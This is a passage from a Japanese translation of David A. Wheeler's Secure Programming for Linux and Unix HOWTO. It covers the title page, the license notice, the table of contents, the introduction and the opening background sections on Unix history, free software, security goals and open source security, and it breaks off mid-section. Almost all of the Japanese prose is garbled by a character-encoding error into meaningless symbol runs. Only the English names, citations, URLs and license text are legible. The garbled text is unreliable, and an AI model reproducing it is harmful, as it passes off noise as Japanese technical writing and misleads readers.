Secure Programming for Linux and Unix HOWTO

David A. Wheeler

dwheeler@dwheeler.com

 - {

hisai@din.or.jp

v2.962 Edition

Copyright (C) 1999, 2000, 2001, 2002 by David A. Wheeler

v2.962, 12 March 2002

́̕ALinux  Unix VXeňSȃvOۂɕK
vƂȂ݌vɂāÃKChC񋟂܂Bũf[^
邽߂̃r[A[ Web AvP[V(CGI XNvg܂)Al
bg[NET[oAsetuid  setgid ĂvOΏۂłB C
 C++AJavaAPerlAPHPAPythonATCLAAda95 ʂ̃KChCfڂ
܂B

This book is Copyright (C) 1999-2002 David A. Wheeler. Permission is
granted to copy, distribute and/or modify this book under the terms of
the GNU Free Documentation License (GFDL), Version 1.1 or any later
version published by the Free Software Foundation; with the invariant
sections being ``About the Author'', with no Front-Cover Texts, and no
Back-Cover texts. A copy of the license is included in the section
entitled "GNU Free Documentation License". This book is distributed in
the hope that it will be useful, but WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE.

 

Table of Contents
1. ͂߂
2. wi
   
    2.1. Unix  LinuxAI[v\[X̓t[\tgEFAɂ
        
    2.2. ZLeB̌
    2.3. ȂvO}͊ȂR[hĂ܂̂
    2.4. I[v\[X̓ZLeBɌʂ̂
    2.5. SȃvO̎
    2.6. ^[A肪Ƃɉl
    2.7. ̃hLg ?
    2.8. ݌vƎ̎wjɂĂ̏
    2.9. ̑̃ZLeB
    2.10. hLgł̖񑩎
   
3. Linux  Unix ̃ZLeB@\
   
    3.1. vZX
    3.2. t@C
    3.3. System V IPC
    3.4. \Pbgƃlbg[Nڑ
    3.5. VOi
    3.6. Quota ƃ\[X̐
    3.7. _Ci~bNNECu
    3.8. Audit(č)
    3.9. PAM
    3.10. Unix CNȃVXeɌŗLȃZLeBg@\
   
4. ׂ͂̂Ă؂邱
   
    4.1. R}hC
    4.2. ϐ
    4.3. t@CEfBXNv^
    4.4. t@C̓e
    4.5. Web x[X̃AvP[V̓( CGI XNvg)
    4.6. ̑̓
    4.7. R(J[)̑I
    4.8. ̃GR[h
    4.9. TCgɂ܂ӂRec(Cross-site Malicious
        Content)h
    4.10. ĕ\\̂ HTML  URI ɂ̓tB^
    4.11. NGȊO̎s HTTP  GET ߂g킹Ȃ
    4.12. SPAM ɑ΍R
    4.13. ͎Ԃƕ׃xɐ
   
5. obt@I[o[t[̉
   
    5.1. C  C++ ̊댯ȂƂ
    5.2. C  C++ ł̃Cuɂ
    5.3. C  C++ ł̃RpCɂ
    5.4. ̑̌
   
6. vÕC^tF[XƓ\Ƃ邱
   
    6.1. SȃvO邽߂ɂ́A\tgEFAEGWjAO
        ̌ɏ]
    6.2. C^tF[XS
    6.3. f[^Ɛ؂藣
    6.4. ŏ
    6.5. 1 ̍\vf̋@\ŏɂ
    6.6. setuid  setgid XNvggȂ
    6.7. ݒSɂASȃftHggp
    6.8. lSɃ[h
    6.9. tFCEZ[t
    6.10. Ԃ
    6.11. MłoHM邱
    6.12. MpX(Trusted Path)݂
    6.13. ňѐ`FbNR[h𗘗p
    6.14. \[XȐ䂷
    6.15. TCgɂ܂đ݂鈫ӂRech
    6.16. Z}eBbNU̗
    6.17. f[^̎ނɋCz
   
7. ̃\[X𗘗pꍇ͐Td
   
    7.1. SȃCuE[`Ăяo
    7.2. lłĂяo
    7.3. ^LN^
    7.4. vO}̃C^tF[XĂяo
    7.5. VXeR[̕Ԃlׂ͂ă`FbN
    7.6. vfork(2)͎gȂ
    7.7. g݃Rec̓ǂݍݎɔ Web oOɑΏ
    7.8. 閧ɂ͉B
   
8. ͂肷ătB[hobN
   
    8.1. tB[hobN͍ŏ
    8.2. Rg͂Ȃ
    8.3. o͂ꂽAxꍇΏ
    8.4. f[^tH[}bg𐧌䂷(uv)
    8.5. o͎ɕ𐧌䂷
    8.6. Include t@Cݒt@Cւ̃ANZXh
   
9. ŗL̖
   
    9.1. C  C++
    9.2. Perl
    9.3. Python
    9.4. VFXNvg(sh  csh n)
    9.5. Ada
    9.6. Java
    9.7. TCL
    9.8. PHP
   
10. IȘb
   
    10.1. pX[h
    10.2. Web ̔F
    10.3. 
    10.4. [UԂł͂Ƃ킯閧(pX[h⌮)
    10.5. ÍASYƃvgR
    10.6. PAM g
    10.7. c[
    10.8. Windows CE
    10.9. čL^
    10.10. IȘRk
    10.11. ̑
   
11. _
12. Ql
A. 
B. Ƃ
C. hLg̃CZXɂ
D. GNU Free Documentation License
E. About the Author
F. {Ŏӎ

List of Tables
4-1. Legal UTF-8 Sequences

List of Figures
1-1. vOTO}

 

Chapter 1. ͂߂

                                    y󒐁F̖́A{ 
                                    V󂩂p܂B 
                                    Qƌł NIV(New International 
                                    Version)łĂ߁A 
                                    { (http://www.gospelcom.net/
                                    ibs/bibles/japanese/) ͗p܂ 
                                    łBȉlłz             
                                                                       
                                    mbl͂ЂƂŗEm̒ 
                                    肻̗݂ƂԂ𗎂ƂƂ 
                                    łB                           
                                                                       
                                               񐹏⼌ 21  22 

̕ Linux  Unix VXeňSȃvOۂɕKv
ƂȂ݌vɂāÃKChC񋟂܂B̈̕Ӑ}
AuSȃvOvƂ́AZLeB̋EɈʒuÃv
OƂ͈قȂANZXڑ̓͂vO
B̂悤ȃvOɂ́Aũf[^邽߂̃r[A[g
̂A Web AvP[V(CGI XNvg܂)Albg[NET
[oAsetuid  setgid ĂvO܂B̕ł
AIy[eBOVXẽJ[l̂̏C͈܂񂪁Aꂩ
c_錴̓J[lɑ΂ĂKpłꍇ悭܂BSȃv
Oǂ̂悤ɍ쐬邩ɂāA܂܂ȏ񌹂𒲂׉u
PvɁAKChCƂč\AL͂ɓKpł悤ɂ
 (҂̍lĂ܂)B͂̕̌A̓Iɂ C
 C++AJavaAPerlAPHPAPythonATCLA Ada95 ɌŗL̎LڂĂ
܂B

́̕Aۏ؊\tgEFAEGWjAO̍HAiۏ؂
猩g݂ɂĂ͐GĂ܂B̂悤ȎwW͑؂łA
ɂŋc_Ă܂BeXgsAEr[ARtBM[
VǗA`IȊe̕@ɓ܂BZLeBɊ֘A
JɓĂ̕ۏ؊ɂẮA the Common Criteria [CC 1999] 
the Systems Security Engineering Capability Maturity Model [SSE-CMM
1999] ɋLڂĂ܂B\tgEFAEGWjAO̍HSʂɂ
Ă Software Engineering Institute's Capability Maturity Model for
Software (SW-CMM) [Paulk 1993a, 1993b]  ISO 12207 [ISO 12207] Q
ĂBiȃVXeɂĂ̍ەWɂẮAISO 9000 
ISO 9001 [ISO 9000, 9001] QƂĂB  

̕ł́ÅɂVXelbg[NSɐݒ肷
@ɂĂ͘_܂BSȐݒ́AvOSɎgp
̂ɕK{ł邱Ƃ͖炩łASɐݒ肷邱Ƃ_hL
g͑ɂ񂠂܂B Unix CNȃVXeSɐݒ肷邱
ƂɂďqׂĂ鏑Ђɂ Garfinkel [1996]Ƃf炵i
܂BɂAAnonymous[1998]Ƃ̂܂B܂ Web TCgł
𓾂܂BƂ http://www.unixtools.com/security.html 
B Linux VXeSɐݒ肷ɂẮA܂܂ȃhL
gp\łBFenzi[1999]  Seifried[1999]AWreski[1998]ASwan
[2001]A Anonymous[1999] ɓ܂B Geodsoft [2001] ł
OpenBSD ɋłɂ邩ƂƂɉāA Unix CNȃVXe
ɖɗ񂠂܂B Linux VXe(܂Ƃ둼
Unix CNȃVXe)^[QbgɂĂȂABastille Hardening
System𒲂ׂ̂ǂł傤B̃VXe Linux Iy[eBOV
Xe苭łŌdɂ悤ƂĂ܂B Bastille ɂĒm
肽ȂA http://www.bastille-linux.org ĂBGeneral
Public License (GPL) ɂĎRɗpł܂B Windows 2000 ^
[QbgȂ Cox[2000] ̂悢ł傤BčƈSۏ(The
U.S. National Security Agency(NSA)) ́AZLeBɊւĂ̐KC
h http://nsa1.www.conxion.com ŐĂ܂B̒ɂ́Au60
Minute Network Security GuidevƂ̂܂B

Rs[^ݒ肷̂́AZLeBǗ̈ꕔɂ܂BZ
LeBǗ͍L͂ȓeJo[Ă܂BECXւ̑Ώ@
̂悤ȑgDIȃZLeBE|VKvŁAƌpv͂ǂ
AƂƓ܂ł܂BZLeBǗɂ͍ۓIȊƃK
ChC܂B ISO 13335 ͑S 5 ȂeNjJE|[g
\AZLeBǗ̎ɂȂĂ܂[ISO 13335]B܂
ISO/IEC 17799:2000 ł͍ƕW`Ă܂[ISO 17799]BK肵
ÍAugDɂāAZLeBǗAsAێ
C𕉂̐lԂɐ񋟂vƂł(Le
܂BZpł͂܂)B[̂ ISO/IEC 17799:2000 ̈ӌ
ĂƂłBxM[Ji_AtXAhCcAC^A
A{Ač͍̑ɔ΂܂Bc_ɂĂ̏ڍׂ́ANIST(National
Institute of Standards and Technology)  ISO/IEC 17799:2000 FAQ <http:
//csrc.nist.gov/publications/secpubs/otherpubs/reviso-faq.pdf> Ă
B The Commonly Accepted Security Practices & Recommendations
(CASPR)( http://www.caspr.org)vWFNǵAZLeBW
ANpłhLg̍쐬Ɏgł܂ (N̕
̔h\ł葱悤ɁAGNU FDL CZXƂ܂
)B

͓̕ǎ҂̕Rs[^̃ZLeBʂAUnix CNȃVX
eAlbg[N( TCP/IP x[X)AC ɂėĂ邱
OɂĂ܂B̕ɂ Linux  Unix ŃZLeBێ
̂ɕKvȃvO~OEf̏񂪂܂B TCP/IP x[X̃lb
g[NSȃvgR܂ރvgR̓ɂĂɒm肽
ȂA[Murhammer 1998] ̂悤 TCP/IP SʂɂĂ̎𒲂ׂĂ
B

̕ Unix CNȃVXeSĖԗĂ܂BLinux ͂߁A
܂܂Ȍn Unix ܂ł܂A Linux ɏœ_𓖂āALinux
ɓ񋟂܂B Windows CE ɏœ_𓖂ĂƂ܂
Aۑ啔̍ڂ͓̃Iy[eBOVXeɌ肳܂B
֘AłŐGĂȂ΁Am点B

̌̕{́Ahttp://www.dwheeler.com/secure-programs ɂ܂B
̕ Linux Documentation Project (LDP) http://www.linuxdoc.org 
ꕔłA~[TCg݂Ă܂B~[ɂ LDP 
Rs[fBXgr[Vɂ̂́A{ÂȂ
̂ŒӂĂB̕ɂĈӌƏ܂A
ŐVł܂mFĂAĂB

This book is copyright (C) 1999-2001 David A. Wheeler and is covered by
the GNU Free Documentation License (GFDL); ڂ́AAppendix C  
Appendix D ĂB

Chapter 2 ł Unix  LinuxAZLeB̔wiɂĘ_܂B 
Chapter 3 ܂ Unix  Linux ̃ZLeBEfSʂɂĘ_Ă
܂B̃f́AZLeBɊւ鑮ƃvZXt@CVXe
̑ɂĊTς܂BāA̗̕vƂȂ Linux  Unix
VXeŃAvP[VJɓẮA݌vƎ̃KCh
C܂B͂͌̕_ Chapter 11 Œ߂ǍɎQl
ꗗƕt^ƕт܂B

vO}̊ϓ_Ƃďdvƍl鑤ʂA݌vƎɂẴKCh
C𕪗ނ܂BvO͓͂Af[^Ã\
[XĂяoAo͂𐶐܂BFigure 1-1͂}ŕ\킵Ă܂
B܂TOAZLeBEKChCׂ͂ẴJeŜ
ꂩɓĂ͂܂܂BɁuf[^vIȘbɕނ܂B
̕Ƃ́AvO̍\ւ̎gݕ(Chapter 6)Aobt@
I[o[t[(̖͂ƂČP[X܂)̉A
ŗL̏łB͂̍\́AĂė₷悤ɂĂ܂B
̍lɂƂÂÃKChC̏͗Ă͎̂悤ɂȂ܂B
ׂ̂Ă؂(Chapter 4)Aobt@I[o[t[̉ (
Chapter 5)AvÕC^tF[XƓ\Ƃ邱(
Chapter 6)Ã\[X𗘗pꍇ͐Td(Chapter 7)A͂肷
ătB[hobN (Chapter 8)AŗL̖ (Chapter 9)A
čŌɂǂ̂悤ɗ𓾂邩ƂAIȘb(Chapter 10)
ƂƂ܂B

Figure 1-1. vOTO}

[program]

 

Chapter 2. wi

                                    ĒׂƂA̓s͐ 
                                    ̉ɑ΂ĔRAt 
                                    NƂmFꂽB   
                                                                       
                                            񐹏GYL 4  19 
 

2.1. Unix  LinuxAI[v\[X̓t[\tgEFAɂ

2.1.1. Unix

1969  1970 NɂāAKenneth Thompson  Dennis Ritchie 炪
AT&T xɂāAقƂǎgĂȂ PDP-7 ŁAƂ
Iy[eBOVXeJ͂߂܂B̃Iy[eBOV
Xe͂܂Ȃ Unix Ƃ疼܂Bɒa MULTICS
ƌĂ΂ꂽIy[eBOVXeĕt܂B 1972 
1973 NɂāAC ŃVXeAɂĎvȂ
jނƂɂȂ܂B܂肱̌fɂ Unix ̓IWĩn[
hEFAƗAɐ炦ŏ̃Iy[eBOVXe
Ȃ܂B Unix ɂ͑ɂV@̋@\܂B̓x
ƃAJf~bNȃR~jeBƂ̑ʂ̂łB 1979 NɁu
seventh editionv (V7)ƌĂ΂o[W Unix [XA
Ă Unix VXeׂĂ̎nca܂B 

̎_ Unix ͂ɓ荞݂܂BAJf~bNȐE
́Ao[NCZ[_[ƂȂ Berkeley Software Distribution (BSD)
nJ܂B AT&T  Unix uSystem IIIvƂ
ŊJAꂪɁuSystem VvƂȂ܂B 1980 Ň㔼
1990 N̑OɂāA 2 ̃W[ȌnԂŁu푈vu
B̌㉽Nꂼ̌ńȀdvȋ@\̑ꂠ
܂Bpł System V uW푈vɑł(̃C^tF
[X̂قƂǂ̕WɂȂ܂)An[hEFAx_[̑啔
AT&T  System V Ɉڍs܂BASystem V  BSD ̊vVIȋZp
gݍłāAǂ 2 ̎x 1 ɓVXe
Ȃ܂B BSD h͐炦A PC n[hEFApApT[
o(Ƃ Web TCg BSD ̗ރVXegĂꍇ
)ƂčLp悤ɂȂ܂B

 seventh edition NƂ鑽ʂȃo[W Unix ݂
ʂɂȂ܂B Unix ̑啔̃o[ẂAn[hEFAx_[
LAꂼŃeiXĂ܂BƂ Sun  Solaris 
System V nłB BSD n Unix ̓ 3 ̃o[ẂAI[v\
[XɂȂ܂B FreeBSD(PC ^Cṽn[hEFAɊȒPɃCXg[
ł邱Ƃڎw) NetBSD(e CPU A[LeN`œ삷邱Ƃ
ڎw)ANetBSD ̌nɂȂ OpenBSD(ZLeBɏd_u)
܂B Unix ݂̕ɂĂɏڍׂȏ́A http://
www.datametrics.com/tech/unix/uxhistry/brf-hist.htm  http://
perso.wanadoo.fr/levenez/unix ɂ܂B BSD ݂̕ɂĂ̂ɏ
́A ftp://ftp.freebsd.org/pub/FreeBSD/FreeBSD-current/src/
share/misc/bsd-family-tree ɂ܂B

OɂȂ܂AẐł[ John Kirch's paper
``Microsoft Windows NT Server 4.0 versus UNIX'' <http://web.archive.org
/web/20010801155417/www.unix-vs-nt.org/kirch> ܂B Unix
CNȃVXegƂɂāA_N܂By󒐁F
{́AMicrosoft Windows NT Server 4.0  UNIX Ƃ̔r <http://
www.anc-tv.ne.jp/~peanuts1/Translation/kirch.net/unix-nt.j.html>ɂ
܂z

 

2.1.2. Free Software Foundation

1984 N Richard Stallman  Free Software Foundation(FSF)̓t[
Unix Iy[eBOVXeグ邽߂ GNU vWFNg𗧂
グ܂B Stallman ɂ΃t[Ƃ͎RɗpłAǂނƂ
łAC\ŁAĔzzł邱ƂӖ܂B FSF ͖cȐ̖
ɗ OS ̍\vfJ܂B̒ɂ C RpC (gcc)f
炵eLXgEGfB^(emacs)̊{Iȃc[ނ܂B
A1990 N FSF ̓Iy[eBOVXẽJ[lJŖɂԂ
܂[FSF 1998]B̓J[lȂɂ͎c̃\tgEFA
ȂƂłB

 

2.1.3. Linux

1991 N Linus Torvalds ̓Iy[eBOVXẽJ[lJ
͂߁AɁuLinuxvƂO܂[Torvalds 1999]B̃J[
lɂ FSF ̐ʕƂ̑̕(BSD 炢 MIT  X Window
System)\ARɏC\łHIȃIy[eBOVXe
ƂȂ܂B̓̕J[lgwꍇɁuLinux J[lv
AŜgݍ킹̂uLinuxvƂ܂B悭guGNU/Linuxv
t́Ȃgݍ킹\tƓӖŗpꍇ唼łB

Linux R~jeBł́A܂܂ȑgDꂼɗc[gݍ
킹Ă܂Bꂼ̑gݍ킹́AufBXgr[VvƌĂ
AfBXgr[VJgDufBXgr[^vƌĂ
ł܂B悭mꂽfBXgr[Vɂ́ARed Hat  MandrakeA
SuSEACalderaA CorelADebian ܂BfBXgr[VԂɈ
͂܂ARAgăfBXgr[V\zĂ܂
BRAƂ Linux J[l GNU glibc Cuw܂B\tgE
FAƂucopyleftvX^C̃CZXɂȂĂāAÑRA
̕ύX𗘗płȂ΂ȂƂɂȂĂ܂BLinux fBXg
r[VԂɑ݂邱̋͂́ABSD  AT&T h Unix V
Xe̊Ԃɂ݂͑Ă܂B̕ł͓ Linux fBXgr
[V^[Qbgɂ͂܂B Linux ɂĘ_鎞ɂ́AOƂ
 Linux J[l̃o[W 2.2 ȏŁAC Cuo[W 2.1
ȏƂ܂B̃W[ Linux fBXgr[Vׂ͂Ă
O𖞂Ă܂B 

 

2.1.4. I[v\[Xƃt[\tgEFA

\tgEFARɋL邱Ƃɑ΂֐S܂ɂāA
`A邱ƂKvsɂȂĂ܂BuI[v\[XE\t
gEFAvƂLpĂp[OSI 1999] łɏڂ`
Ă܂B Eric Raymond[1997, 1998]͓ƑnIȘ_ŁAI[v\[XE
\tgEFAɂ邳܂܂ȊJvZXɂĐĂ܂B
1 LgĂpɁut[\tgEFAvAŌut
[vƂ́uƂĂ̎RvӖ܂B̗ƂĂ悭o
́u_̎Rvłāuvł͂ȂAłBy󒐁Ffree ɂ́Au
RvƁuvƂ 2 ̈Ӗ܂zBǂ̗pł͂
܂Bs`𖳏ŔzzłƂĂA\[XR[hȂ
ACłȂAĔzzłȂ肵̂́ut[\t
gEFAvƂ͔F߂Ȃ̂ʗłBtɁuI[v\[XvƂp
\[XR[h͌邪ApCAĔzzɐ\tgEFA
Ӗ()ꍇɎg邱Ƃ܂Bɏڂ`ɂ
Ă Open Source Definition <http://www.opensource.org/osd.html> 
B̌tg@ɈႢłꍇ܂But[\tg
EFAvƂtDȐĺAuƂĂ̎RvKvł邱Ƃ
邱ƂD݂܂BŁA̓@(ƂΐM)
ĂAdɎ咣킯ł͂Ȃ肷lgĂ
ꍇ܂Bt[\tgEFAɂĂ̒`ړIɂĂ http:/
/www.fsf.org ĂB 

I[v\[XE\tgEFAt[\tgɂĂ̎咣̐Xɋ
ȂAhttp://www.opensource.org  http://www.fsf.org ЌĂ
B̑ɂ Miller[1995]̂悤ɃI[v\[XE\tgEFAt
[\tgɂĒ܂B̒ŃI[v\[X́A
ƂLĂ\tgEFAΔĐMAƂȂĂ
(\tgEFAɑ΂ă_ȓ͂sAǂꂾNbVɑς
̂AƎɌvĂ܂)B

 

2.1.5. Linux  Unix r

̕ł́AuUnix CNȁvƂtA Unix ɎVXe
w߂ɎgĂ܂BuUnix CNȁvƂt́AW[
Unix ׂĂ Linux fBXgr[VwĂ܂BuUnixvƂ
tPɁuUnix CNȁvƓӖŎgĂlƂY
łBuUnixv AT&T JiӖ܂B
ł Open Group  Unix ̏WLĂĂ܂Bł Unix u
Eł 1  UNIX Kivƒ`Ă܂B 

Linux  Unix ̃\[XR[h󂯌pł܂񂪁AC^tF[X͂
 Unix ɎĂ܂B̂߁AUnix ̍u`Ŋw񂾂Ƃ̓ZLe
B̒m܂߂ĂقƂǂǂ̃VXeɂĂ͂܂܂B̕
唼̏͂ǂ Unix CNȃVXeɂĂ͂܂܂B Linux g
ƃbgoꍇɂ́A Linux ɓǉĂ܂
B

Unix CNȃVXe͂낢ƃZLeB̎dg݂LĂ܂
AɈႢ̂ŁAׂẴVXeł̎dgׂ݂ėpł
킯ł͂܂BvZXɑ΂郆[UO[v ID(uid  gid)ƃt
@CVXeɑ΂ǂݏAs([UO[vȂ)͂
ẴVXeŗpł܂B Thompson[1974] Bach[1986]ɂ Unix VX
eʂɂĂ̏񂪂A{IȃZLeB̎dg݂ɂĂG
Ă܂B Chapter 3 ł Unix  Linux ̃ZLeB@\ŌƂȂ
Ƃv񂵂܂B

 

2.2. ZLeB̌

ZLeB̌ƂāAOɗĂȂ΂ȂȂƂ
񂠂܂B Information Assurance Technical Framework(IATF)[NSA
2000]́ALZLeB𓾂̂ɓKƂłB NIST ́u
@ƂčLF߂ĂvnCxȏꏊƌĂ܂B܂
Rs[^̃ZLeBԗĂeLXgƂāA[Pfleeger 1997]
܂BŁAZLeB̌ɂĂv񂵂Ă݂܂
B

Rs[^ZLeB͑Ŝ 3 ̖ڕW܂B

 E @ێ(閧ێƂ܂)BRs[^VXe
    Y͔F؂󂯂o[ANZXł邱ƂӖ܂B
   
 E SȏԂۂBF؉ߒoċ󂯁Ao[
    YύXł邱ƂӖ܂B
   
 E pł邱ƁBo[AY֓K(VXeKv
    vɂČ܂)ANZXł܂B̖ڕWBłȂꍇ
    ́AT[rXۂƂԂɂȂ܂B
   
ɖڕWǉꍇ܂AǉڕW 3 ̖ڕW̓
ȃP[XƂĂ܂Ƃ߂Ă܂Ƃ܂BƂ΁AۂȂ
ƗڕWƂĂꍇ܂B́A葤bZ[W
ƁA󂯎葤bZ[W󂯎ƁA܂̗͂u
v\͂̂ƂłBƂA葤܂͎󂯎葤łے
ȂƂĂłBvCoV[@ێƂ͋ʂĈꍇ
܂Bf[^ł͂ȂA[U(Ƃ΃[U̐g)̋@ێ
Ƃƒ`ꍇ܂BڕẂAʂƔF؂KvƂĂꍇ
悭Aɂ͓ƗڕWƂċLڂĂꍇ܂Bč(]
Ƃ܂)̓ZLeB̖ڕWƂčD܂ƂĂ܂BlɁu
ANZXvu{lł邱Ƃ̔F؁v͕ʕƂċLڂĂꍇ
܂Bǂ̃P[XłĂAvOŜɓnāAZLeB
ڕWƈv邱ƂdvłBڕWǂ̂悤ɂ܂Ƃ߂悤ƁA̖ڕW
ɍv邱ƂdvȂ̂łB

ɂ̖͂ڕWAm̋Ђɑ΂΍Riłꍇ@Ő
Ăꍇ܂BƂ΁Ač̋sZ@ւɑ΂āAu
Gramm-Leach-Blileyv(GLB)@ƂvCoV[֘A̐V@ł܂
B̖@ł́ALlJ邱ƋyтSɂ
邱ƂK{ƂAO҂Ƃ̊ԂŋLl̊JvA
ɁA̋@ւɑ΂Čڋqf[^L~߂@^悤w
Ă܂ [Jones 2000]B

ZLeBƃVXe\tgEFÂ̑̋ZpjƂ
܂BZLeBuȒPɎgvƂWꍇ邩
BƂΈSȐݒ{ɂ́A͂̂̈Sł͂Ȃݒ
ԂKv邩܂B̑_łꍇ
͑X܂BƂΖ_悭l邱ƂŁAȒPɗpłĂ
SȃVXe\złꍇ悭܂BZLeBƒۉ(
̉B)ɂ_܂BƂ΍xȃCuE[`
ASɎĂ낤Ȃ낤Adl͉킩܂B܂
AvP[VɈS߂ꍇAmMĂȂȂAg
Ȃ΂܂B܂肻̃CuCȂ΂Ȃ
ƂƂłBȂsK؂ȃCuE[`IƁAf
̂̓[UȂ̂łB

uOIɖh䂷vƂ́AZLeBDĂ܂B
̖h@\(Kw)KꏊɔzuAUɐɂ͕̋@\U
jȂ΂ȂȂ悤ɐ݌v܂B

 

2.3. ȂvO}͊ȂR[hĂ܂̂

vO}̑́AȂR[hƂĂ킯ł͂܂
AȂĂ܂̂łBR͎Rقǂ܂BBugtraq  Aleph One 
RW߂ėv񂵂Ă܂ (1998 N 12  17 ɓe܂)B

 E قƂǂ̋@ւɂ́ARs[^̃ZLeBJL
    ܂BJLƂĂAǂ̂悤ɂĈS
    R[ĥ͘_ĂȂ̂ʂłBJL̑
    ł́AÍ@vgRƂ̕삾wKł܂B
    ͊mɏdvłAobt@I[o[t[╶̃tH[}
    bgA͂̃`FbNƂ̐EōLƂȂĂ__
    ̂ӂĂ܂B͍łdȖ_ 1 Ǝ͍lĂ
    ܂Bw𑲋ƂvO}łASȃvOǂ̂悤
    Ă悢̂ɂĂ܂mȂ̂łBɂ炸AS
    KvƂȂvÔłÂ悤ȐlXvO
    ɗ炴邦܂B
   
 E vO~ȌЂNXł́ASŊmȃvO~OZp
    Kł܂Bۍŋ߂ɂȂ܂ŁASɃvO@ɂ
    Ă̏Ђ͂܂܂ł(͐̕Ȃ̂̓ 1
    ł)B
   
 E NȌؖ@gĂ܂B
   
 E C ͈SȌł͂܂BW C CuŗpӂĂ镶
    ֌W̊֐SƂ͂܂B̓_͂Ƃ킯dłBƂ
    ̂ C ͔ɍL͂ɗpĂāA C u[lv
    ɗpƁA댯ȃZLeBz[ٔF邱ƂɂȂ܂B
   
 E vO}́u[Uv̈l܂B
   
 E vO}͐lԂŁAlԂ͕słB܂AvO}͈SȃAv
    [`uȁvAv[`肪łB܂蓮삵Ă
    ΁AォC邱Ƃ͂قƂǂ܂B
   
 E ẴvO}͗DĂƂ͂܂܂B
   
 E ẴvO}̓ZLeB֘A̐lԂł͂ȂAU̍l
    ɂ܂Ŏv܂B
   
 E ZLeBɊւĂlԂ́AĂvO}ł͂܂B
     Bugtraq ւ̓e҂̉l咣Ă邱ƂŁA^ł邩
    ǂ͂͂肵Ă܂B
   
 E Rs[^̃ZLeBEf̑唼͂Ђǂ㕨łB
   
 E \tgEFA̒ɂ́AɁuĂ܂Ăv̂Ɏg
    Ă̂񂠂܂B̃\tgEFAC(ZLe
    B̖菜A茵ZLeBE|V̌œ
    ɂ)͍̂łB
   
 E ҂̓ZLeBɖ֐SłB (lIɂ́A҂ZLe
    BɊ֐S͂߂邱Ƃ]ł܂BĂRs
    [^EVXéAɗȂǂ납Agǂ܂
    B܂҂̑́A肪邱ƂɂCÂĂȂ΂肩A
    󋵂D]ĂȂƂm܂)B 
   
 E ZLeBmۂɂ́A]vȊJԂKvɂȂ܂B
   
 E ZLeBmۂɂ́AeXg̖ʂłԂ܂(zG΃`
    [)B
   
 

2.4. I[v\[X̓ZLeBɌʂ̂

ZLeBHĂlԂɂāAI[v\[XZLeB
^eɂāA̋c_ȂĂ܂BȘ__ 1 ɁA
I[v\[X̓\[XR[hJĂ̂ŁANł܂UƖh
䑤̂ǂ\[XR[h𒲂ׂƂ̂܂B̏
Iȉe͂ƂɁAIȐlтƂ͓ӂĂ܂B

ŁÃgsbNɂĒĂXlЉ܂B Bruce
Schneier ́AuȋZp҂ȂAZLeBɊ֘Aׂ͂ăI
[v\[X̃R[hɋ߂ǂv[Schneier 1999]ƂĂ܂B܂
I[v\[Xȃ\tgEFASɂɕK{̏_
܂B Advanced Encryption Standard (AES)̈ÍASY
J҂ł Vincent Rijmen ́AZLeB̐Ǝ㐫ȒPɌ
oAĈɂ Linux ̃I[v\[X̓̏Ȃ
iłƍlĂ܂Bu葽̐lXƂƈȏɏdv
̂́ÃfɂāA薾ȃR[hƁAW炷邱
Ƃ݂ȂɋĂ_łB̓ZLeBEr[X[Y
ɌJԂsƂɑȂ܂v [Rijmen 2000] ƂĂ܂B Elias
Levy (Aleph1) ͔ނ̘_ł "Is Open Source Really More Secure
than Closed?" <http://www.securityfocus.com/commentary/19> ŃI[v\
[X̃\tgEFASɂł̖__Ă܂Bv񂵂Ă݂
ƉL̂悤ɂȂ܂B

   
    ܂AZLeB̐Ǝ㐫ɁAI[v\[XƂ
    Ȃ\tgEFA͑卷Ȃ̂ł傤B͈Ⴂ܂BI[v
    \[X̃\tgEFA͂łȂ\tgEFAAƈSɂ
    錩݂mɂ܂BႢȂŗ~̂́APɃI[
    v\[XƂăZLeBۏ؂킯ł͖Ƃ
    ƂłB
   
John Viega ̘_ł "The Myth of Open Source Security" <http://
dev-opensourceit.earthweb.com/news/000526_security.html> ͂̓__
Ă܂Bv񂵂Ă݂ƉL̂悤ɂȂ܂B

   
    I[v\[X̃\tgEFAEvWFNǵAłȂvWFN
    g̃\tgEFASɂȂ͂߂Ă܂BI[v\
    [X̃vOSɂȂǂłA\[XR[hp
    邱ƁÃ[UZLeBz[ĂC
    łƂ́Al܂ĈS邱ƂɂȂ蓾܂B
   
Michael H. Warfield's "Musings on open source security" <http://
www.linuxworld.com/linuxworld/lw-1998-11/lw-11-ramparts.html> ͂
mMāAI[v\[XZLeBɑ΂ĉe͂Ƃ
Ă܂B Fred Schneider ̓I[v\[X̓ZLeBɖɗ
Ƃ͍lĂ炸Au̖ڂ(I[v)\[Xɒ邱ƂŁAV
XẽZLeB낤Ă܂oO𔭌łƐMɑ闝
R͂܂vƂA܂uR[hɊ܂܂ĂoOAU@Ƃ
łĂ킯ł͂܂v [Schneider 2000]Ƃ咣Ă܂B
܂I[v\[X́AvO\zH̊ǗlĂȂAƂ
Ă܂Aۂɂ͊Ǘ݂͑Ă܂BI[v\[X̃W[
ȃvOׂẮAuӔCҁv̖ʖڂɂč쐬o[W
݂܂B Peter G. Neumann ́uI[vE{bNXv\tg
EFA(\[XR[h󋵉ł݂̂ŋ炭p\)_ĂāA
̒ŁuI[vE{bNXł\tgEFA̓VXẽZLeB
{ɉP̂낤HRƂȂ킯ł͂ȂB\͖
łȂv[Neumann 2000]ƂĂ܂B TruSecure Corporation Ƃ Red
Hat(I[v\[XŊƊĂ)񋟂ĂƂ́AI[v
\[XȂZLeBɗLłƎvĂ̂Ђɂ܂Ƃ
܂[TruSecure 2001]B Natalie Walker Whitlock's IBM DeveloperWorks
article <http://www-106.ibm.com/developerworks/linux/library/
l-oss.html?open&I=252,t=gr,p=SeclmpOS> ł͎^ۗ_ڂĂ܂By
FNatalie Walker Whitlock's IBM DeveloperWorks article ̓{́A
http://www-6.ibm.com/jp/developerworks/linux/010615/j_l-oss.html ɂ
܂zB Brian Witten  Carl Landwehr AMicahel Caloyannides 
[Witten 2001]  IEEE ̃\tgEFA֘A_Ń\[XR[hpł
ƁAVXẽZLeBɍDsɕ^Ԃ͂AƍT߂Ɍ_Â
Ă܂BނɂƁA

   
    úA̋c_炳 4 ̌_o܂BɁA\
    [XR[hɃANZXł΁A[UVXẽZLeBP
    ł悤ɂȂ܂B̂悤ȍ˔\ƐlނȂ΂łB
    ɁAꂽeXgł͈ꕔ̃P[XwEł܂񂪁AI[v\
